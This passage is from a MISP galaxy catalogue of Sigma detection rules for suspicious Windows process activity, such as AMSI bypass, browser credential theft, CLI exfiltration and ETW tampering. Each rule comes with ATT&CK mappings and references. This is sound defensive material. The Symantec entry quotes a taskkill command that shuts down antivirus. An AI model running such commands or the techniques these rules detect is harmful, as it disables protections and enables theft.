https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml

Insecure Transfer Via Curl.EXE

Detects execution of "curl.exe" with the "--insecure" flag.

The tag is: misp-galaxy:sigma-rules="Insecure Transfer Via Curl.EXE"

Table 10910. Table References

Links

https://curl.se/docs/manpage.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml

Remote Code Execute via Winrm.vbs

Detects an attempt to execute code or create service on remote host via winrm.vbs.

The tag is: misp-galaxy:sigma-rules="Remote Code Execute via Winrm.vbs"

Remote Code Execute via Winrm.vbs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10911. Table References

Links

https://twitter.com/bohops/status/994405551751815170

https://redcanary.com/blog/lateral-movement-winrm-wmi/

https://lolbas-project.github.io/lolbas/Scripts/Winrm/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml

Potential PowerShell Obfuscation Via Reversed Commands

Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Obfuscation Via Reversed Commands"

Potential PowerShell Obfuscation Via Reversed Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10913. Table References

Links

https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml

Suspicious Manipulation Of Default Accounts Via Net.EXE

Detects suspicious manipulations of default accounts such as 'administrator' and 'guest', for example enabling or disabling the accounts or changing their password, etc.

The tag is: misp-galaxy:sigma-rules="Suspicious Manipulation Of Default Accounts Via Net.EXE"

Suspicious Manipulation Of Default Accounts Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10914. Table References

Links

https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/

https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_default_accounts_manipulation.yml

Process Creation Using Sysnative Folder

Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)

The tag is: misp-galaxy:sigma-rules="Process Creation Using Sysnative Folder"

Process Creation Using Sysnative Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10915. Table References

Links

https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysnative.yml

Arbitrary File Download Via MSEDGE_PROXY.EXE

Detects usage of "msedge_proxy.exe" to download arbitrary files

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via MSEDGE_PROXY.EXE"

Arbitrary File Download Via MSEDGE_PROXY.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10916. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_proxy_download.yml

PUA - Crassus Execution

Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.

The tag is: misp-galaxy:sigma-rules="PUA - Crassus Execution"

PUA - Crassus Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Properties - T1590.001" with estimative-language:likelihood-probability="almost-certain"

Table 10917. Table References

Links

https://github.com/vu-ls/Crassus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_crassus.yml

Add New Download Source To Winget

Detects usage of winget to add additional download sources

The tag is: misp-galaxy:sigma-rules="Add New Download Source To Winget"

Add New Download Source To Winget has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10918. Table References

Links

https://learn.microsoft.com/en-us/windows/package-manager/winget/source

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml

Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS

Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine

The tag is: misp-galaxy:sigma-rules="Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS"

Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 10919. Table References

Links

https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gather_network_info_execution.yml

Suspicious PowerShell Parent Process

Detects a suspicious or uncommon parent process of PowerShell

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Parent Process"

Suspicious PowerShell Parent Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10920. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parent_process.yml

HackTool - SecurityXploded Execution

Detects the execution of SecurityXploded tools

The tag is: misp-galaxy:sigma-rules="HackTool - SecurityXploded Execution"

HackTool - SecurityXploded Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 10921. Table References

Links

https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/

https://securityxploded.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_secutyxploded.yml

RDP Connection Allowed Via Netsh.EXE

Detects usage of the netsh command to open and allow connections to port 3389 (RDP), as seen used by Sarwent malware

The tag is: misp-galaxy:sigma-rules="RDP Connection Allowed Via Netsh.EXE"

RDP Connection Allowed Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 10922. Table References

Links

https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml

HackTool - SysmonEOP Execution

Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120

The tag is: misp-galaxy:sigma-rules="HackTool - SysmonEOP Execution"

HackTool - SysmonEOP Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 10923. Table References

Links

https://github.com/Wh04m1001/SysmonEoP

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sysmoneop.yml

HackTool - SharpLdapWhoami Execution

Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller

The tag is: misp-galaxy:sigma-rules="HackTool - SharpLdapWhoami Execution"

HackTool - SharpLdapWhoami Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10924. Table References

Links

https://github.com/bugch3ck/SharpLdapWhoami

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml

Imports Registry Key From a File

Detects the import of the specified file to the registry with regedit.exe.

The tag is: misp-galaxy:sigma-rules="Imports Registry Key From a File"

Imports Registry Key From a File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10926. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml

Potential AMSI Bypass Using NULL Bits

Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities

The tag is: misp-galaxy:sigma-rules="Potential AMSI Bypass Using NULL Bits"

Potential AMSI Bypass Using NULL Bits has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10927. Table References

Links

https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml

Suspicious Scheduled Task Creation Involving Temp Folder

Detects the creation of scheduled tasks that involves a temporary folder and runs only once

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Creation Involving Temp Folder"

Suspicious Scheduled Task Creation Involving Temp Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10928. Table References

Links

https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml

VeeamBackup Database Credentials Dump Via Sqlcmd.EXE

Detects a dump of credentials from the VeeamBackup dbo

The tag is: misp-galaxy:sigma-rules="VeeamBackup Database Credentials Dump Via Sqlcmd.EXE"

VeeamBackup Database Credentials Dump Via Sqlcmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 10929. Table References

Links

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml

PUA - Process Hacker Execution

Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.

The tag is: misp-galaxy:sigma-rules="PUA - Process Hacker Execution"

PUA - Process Hacker Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Debugger Evasion - T1622" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 10930. Table References

Links

https://processhacker.sourceforge.io/

https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml

Rundll32 Registered COM Objects

Detects rundll32.exe being used to load malicious registered COM objects

The tag is: misp-galaxy:sigma-rules="Rundll32 Registered COM Objects"

Rundll32 Registered COM Objects has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 10931. Table References

Links

https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml

Writing Of Malicious Files To The Fonts Folder

Monitors for possible malicious files being hidden in the C:\Windows\Fonts\ location. This folder doesn't require admin privilege to be written to and executed from.

The tag is: misp-galaxy:sigma-rules="Writing Of Malicious Files To The Fonts Folder"

Writing Of Malicious Files To The Fonts Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10932. Table References

Links

https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml

Potential Browser Data Stealing

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

The tag is: misp-galaxy:sigma-rules="Potential Browser Data Stealing"

Potential Browser Data Stealing has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 10933. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_browser_data.yml

Renamed NetSupport RAT Execution

Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings

The tag is: misp-galaxy:sigma-rules="Renamed NetSupport RAT Execution"

Table 10934. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml

Potential MsiExec Masquerading

Detects the execution of msiexec.exe from an uncommon directory

The tag is: misp-galaxy:sigma-rules="Potential MsiExec Masquerading"

Potential MsiExec Masquerading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 10935. Table References

Links

https://twitter.com/200_okay_/status/1194765831911215104

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml

Suspicious Outlook Child Process

Detects a suspicious process spawning from an Outlook process.

The tag is: misp-galaxy:sigma-rules="Suspicious Outlook Child Process"

Suspicious Outlook Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 10936. Table References

Links

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html

https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml

Copy From VolumeShadowCopy Via Cmd.EXE

Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)

The tag is: misp-galaxy:sigma-rules="Copy From VolumeShadowCopy Via Cmd.EXE"

Copy From VolumeShadowCopy Via Cmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10937. Table References

Links

https://twitter.com/vxunderground/status/1423336151860002816?s=20

https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/

https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml

Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp

Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.

The tag is: misp-galaxy:sigma-rules="Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp"

Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 10938. Table References

Links

https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication

https://github.com/grayhatkiller/SharpExShell

https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml

Suspicious Msiexec Execute Arbitrary DLL

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).

The tag is: misp-galaxy:sigma-rules="Suspicious Msiexec Execute Arbitrary DLL"

Suspicious Msiexec Execute Arbitrary DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 10939. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://twitter.com/st0pp3r/status/1583914515996897281

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml

Potential MSTSC Shadowing Activity

Detects RDP session hijacking by using MSTSC shadowing

The tag is: misp-galaxy:sigma-rules="Potential MSTSC Shadowing Activity"

Potential MSTSC Shadowing Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"

Table 10940. Table References

Links

https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet

https://twitter.com/kmkz_security/status/1220694202301976576

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml

Wusa.EXE Executed By Parent Process Located In Suspicious Location

Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.

The tag is: misp-galaxy:sigma-rules="Wusa.EXE Executed By Parent Process Located In Suspicious Location"

Table 10941. Table References

Links

https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_parent_execution.yml

Suspicious Schtasks Schedule Type With High Privileges

Detects scheduled task creation or modification that configures the task to run with high privileges on a suspicious schedule type.

The tag is: misp-galaxy:sigma-rules="Suspicious Schtasks Schedule Type With High Privileges"

Suspicious Schtasks Schedule Type With High Privileges has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10942. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type_system.yml

Taskkill Symantec Endpoint Protection

Detects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY\SYSTEM user can execute the "taskkill /im ccSvcHst.exe /f" command several times, thereby killing the process belonging to the service and thus shutting down the service.

The tag is: misp-galaxy:sigma-rules="Taskkill Symantec Endpoint Protection"

Taskkill Symantec Endpoint Protection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10943. Table References

Links

https://www.exploit-db.com/exploits/37525

https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection

https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml

Potential PowerShell Obfuscation Via WCHAR

Detects suspicious encoded character syntax often used for defense evasion

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Obfuscation Via WCHAR"

Potential PowerShell Obfuscation Via WCHAR has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10944. Table References

Links

https://twitter.com/0gtweet/status/1281103918693482496

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml

Invoke-Obfuscation Via Use MSHTA

Detects obfuscated PowerShell that uses MSHTA in scripts (Invoke-Obfuscation style).

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use MSHTA"

Invoke-Obfuscation Via Use MSHTA has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10945. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml

Suspicious NTLM Authentication on the Printer Spooler Service

Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service

The tag is: misp-galaxy:sigma-rules="Suspicious NTLM Authentication on the Printer Spooler Service"

Suspicious NTLM Authentication on the Printer Spooler Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

Table 10946. Table References

Links

https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml

https://twitter.com/med0x2e/status/1520402518685200384

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml

Suspicious Process By Web Server Process

Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation

The tag is: misp-galaxy:sigma-rules="Suspicious Process By Web Server Process"

Suspicious Process By Web Server Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 10948. Table References

Links

https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml

MSExchange Transport Agent Installation

Detects the installation of an Exchange Transport Agent.

The tag is: misp-galaxy:sigma-rules="MSExchange Transport Agent Installation"

MSExchange Transport Agent Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"

Table 10949. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml

Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities exfiltrating data via web requests

The tag is: misp-galaxy:sigma-rules="Potential Data Exfiltration Activity Via CommandLine Tools"

Potential Data Exfiltration Activity Via CommandLine Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10950. Table References

Links

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml

HackTool - KrbRelayUp Execution

Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced

The tag is: misp-galaxy:sigma-rules="HackTool - KrbRelayUp Execution"

HackTool - KrbRelayUp Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"

Table 10951. Table References

Links

https://github.com/Dec0ne/KrbRelayUp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_krbrelayup.yml

Rundll32 Execution Without CommandLine Parameters

Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity

The tag is: misp-galaxy:sigma-rules="Rundll32 Execution Without CommandLine Parameters"

Rundll32 Execution Without CommandLine Parameters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10952. Table References

Links

https://www.cobaltstrike.com/help-opsec

https://twitter.com/ber_m1ng/status/1397948048135778309

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_no_params.yml

Potential Binary Impersonating Sysinternals Tools

Detects binaries that use the same name as legitimate Sysinternals tools to evade detection.

The tag is: misp-galaxy:sigma-rules="Potential Binary Impersonating Sysinternals Tools"

Potential Binary Impersonating Sysinternals Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10953. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml

Potential Tampering With RDP Related Registry Keys Via Reg.EXE

Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values.

The tag is: misp-galaxy:sigma-rules="Potential Tampering With RDP Related Registry Keys Via Reg.EXE"

Potential Tampering With RDP Related Registry Keys Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10955. Table References

Links

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml

Disable of ETW Trace

Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.

The tag is: misp-galaxy:sigma-rules="Disable of ETW Trace"

Disable of ETW Trace has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 10957. Table References

Links

https://abuse.io/lockergoga.txt

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml

Potential Crypto Mining Activity

Detects command line parameters or strings often used by crypto miners

The tag is: misp-galaxy:sigma-rules="Potential Crypto Mining Activity"

Potential Crypto Mining Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 10958. Table References

Links

https://www.poolwatch.io/coin/monero

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crypto_mining_monero.yml

Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE

Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall

The tag is: misp-galaxy:sigma-rules="Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE"

Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 10959. Table References

Links

